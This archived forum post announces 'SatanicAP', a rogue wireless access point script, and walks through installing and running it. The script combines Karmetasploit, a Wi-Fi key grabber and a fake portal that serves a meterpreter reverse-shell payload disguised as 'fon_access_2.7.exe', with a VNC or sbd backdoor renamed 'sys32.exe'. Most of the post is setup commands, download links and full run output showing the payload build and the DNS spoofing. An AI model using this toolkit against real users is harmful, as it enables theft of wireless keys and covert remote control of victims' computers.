No guarantee that it still works! floyd's posts on forums.remote-exploit.org on March 2009: http://forums.remote-exploit.org/wireless/27147-satanicap-karmetasploit-wkg-fakeap-vncbackdoor.html You can find the script and the exes here: http://www.floyd.ch/download/sap.tar.gz Hi everybody The satanic AP is finished. Like the name already says, it's an evil wireless access point. It combines Karmetasploit, Wireless Key Viewer (wkg) by hm2075, FakeAP with sbd by g0tmilk and VNC backdooring in one script (everything is done with meterpreter...). Some important things: - The hole script works for my IBM T43p/atheros wireless card/BT4 pre final as attacker - The victim is Windows Vista on a Lenovo T400 with Antivir - The WLan AP is horribly slow. Maybe it's the mtu size, maybe not. - There are a lot of variables which are exported at the beginning of the script, but you can change nearly everything to your needs - You don't need to download the programms/exes i use, you can compile/download them yourself if you don't trust my executables: --- wkv.exe - Wireless Key View by nirsoft (maybe i modified some bits in my version), Password Recovery Tools for Windows --- sbd.exe is already on BT. I don't use another one. --- vncbackdoor.exe -> follow pureh@tes tutorial on windows backdoor part 1 and Uploading a windows vnc backdoor part 2 , the new version of ultraVNC changed, you don't have to do the registry stuff but pack the .ini file into the exe and run winvnc.exe -run instead of -reinstall. But that's another story. --- fDNS is available on DNSpenTest | Get DNSpenTest at SourceForge.net - SatanicAP can be run in five different modes: --- 0 = Karmetasploit --- 1 = Wireless Key Grabber by hm2075 --- 2 = FakeAP by g0tmilk - You have to shut down your Antivirus on Windows Victim! --- 3 = Wireless Key Grabber (1) and FakeAP (2) together - Shut down Antivirus! --- 4 = UltraVNC Backdoor instead of SBD - Shut down Antivirus (and allow VNC on Win Firewall)! --- 5 = Wireless Key Grabber (1) and VNC Backdoor (4) - Shut down Antivirus (and allow VNC on Win Firewall)! - I only implemented VNC to proof that it's very easy to extend the script. It took about 10 lines of code - I commented out the autometer script because i was too lazy to fix it Here's the script only: http://uploadingit.com/d/PNBZREKGDJLTE4U6 Here's the script including programs/exes: http://uploadingit.com/d/4F757LIBV5RUTPNN Here's the howto (as short/simple as possible): 1. backup dhcpd.conf Code: cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak 2. Change into /root/ folder Code: cd /root/ 3. Download Uploadingit.com | Downloading File: satanicAP.tar.gz and extract it into /root/ Code: cd /root/ tar -zxf satanicAP.tar.gz cd ./SAP 4. Read satanicAP.sh script to understand what it does! 5. Go through the export statements at the beginning of the script and change them to your needs. Leave everything you don't understand 6. Make executable Code: chmod +x satanicAP.sh 7. Run it the first time and read its output Code: ./satanicAP.sh 8. Start Karmetasploit and read its output Code: ./satanicAP.sh 0 0 9. Connect with a Windows Machine to the AP and open up a browser (mine was not vulnerable) 10. Back in Backtrack you can test other combinations: Code: ./satanicAP.sh 1 1 11. Disconnect and Reconnect again with the Windows Machine, open up a browser and go to Google or www.uezdfedjw.net, download the mentioned exe file from the "fon" page and execute it. On the Backtrack machine you will see Metasploit starting the "Sending Stage". It takes about 1 minute in my lab. With vnc it takes much longer, because the vncbackdoor.exe is bigger. 12. Here is the output of the script after a successfull execution (example for ./satanicAP 5 0): Code: root@floyd:~/SAP# ./satanicAP.sh 5 0 [+] Satanic AP by floyd fuh [+] Cleaning up befor I begin Site Satanic_AP disabled. Run '/etc/init.d/apache2 reload' to activate new configuration! Stopping web server: apache2apache2: apr_sockaddr_info_get() failed for floyd apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName [Mon Sep 28 18:09:56 2009] [warn] NameVirtualHost *:80 has no VirtualHosts ... waiting . Interface Chipset Driver wlan0 Atheros ath5k - [phy0] mon0 Atheros ath5k - [phy0] (removed) Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode disabled) [+] Making dirs mkdir: cannot create directory `/root/SAP': File exists mkdir: cannot create directory `/root/SAP/www': File exists mkdir: cannot create directory `/root/SAP/payload': File exists mkdir: cannot create directory `/root/SAP/tools': File exists mkdir: cannot create directory `/root/SAP/tools/dns_spoof': File exists [+] Killing wicd Stopping Network connection manager: wicd. wicd-client: no process killed [+] Starting Monitor Mode Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 8117 dhclient Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) [+] Changing MAC of mon0 to 00:10:23:A2:F2:83 Current MAC: 00:1X:aX:3X:X5:X1 (unknown) Faked MAC: 00:10:23:a2:f2:83 (Flowwise Networks, Inc.) [+] Writing /etc/dhcp3/dhcpd.conf [+] Setting up AP [+] Sleeping to wait for interface [+] Starting apache Starting web server: apache2apache2: apr_sockaddr_info_get() failed for floyd apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName [Mon Sep 28 18:10:07 2009] [warn] NameVirtualHost *:80 has no VirtualHosts . [+] Setting up VirtualHost config for Satanic AP [+] Disabling Apache2 site default, enabling Satanic_AP Site default already disabled Enabling site Satanic_AP. Run '/etc/init.d/apache2 reload' to activate new configuration! [+] Reloading Apache2 Reloading web server config: apache2apache2: apr_sockaddr_info_get() failed for floyd apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName . [+] Compile payload fon_access_2.7.exe (reverse tcp shell) Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 272 Options: LHOST=10.0.0.1,LPORT=5555 [+] Writing proof file [+] Writing common proof file script [+] Writing FakeAP script [+] Copying the second payload vncbackdoor.exe/sbd.exe to sys32.exe [+] Writing Metasploit script [+] Starting Metasploit [+] Setting up interfaces and iptables [+] Starting DHCP Internet Systems Consortium DHCP Server V3.1.1 Copyright 2004-2008 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ Wrote 13 leases to leases file. Listening on LPF/at0/00:10:23:a2:f2:83/10.0.0/24 Sending on LPF/at0/00:10:23:a2:f2:83/10.0.0/24 Sending on Socket/fallback/fallback-net Can't create PID file /var/run/dhcpd.pid: Permission denied. [+] Starting DNS Spoof [+] You probably have to connect to 10.0.0.100::1050 [+] The password is satanicAPConnect For further explanation watch pureh@tes http://blip.tv/file/577132 as well as http://uploads.blip.tv/file/577932 . The new version of UltaVNC uses a .ini file instead of registry and you just have to winvnc.exe -run instead of winvnc.exe -reinstall. [+] Satanic AP over and out. floyd fuh Feel free to ask questions floyd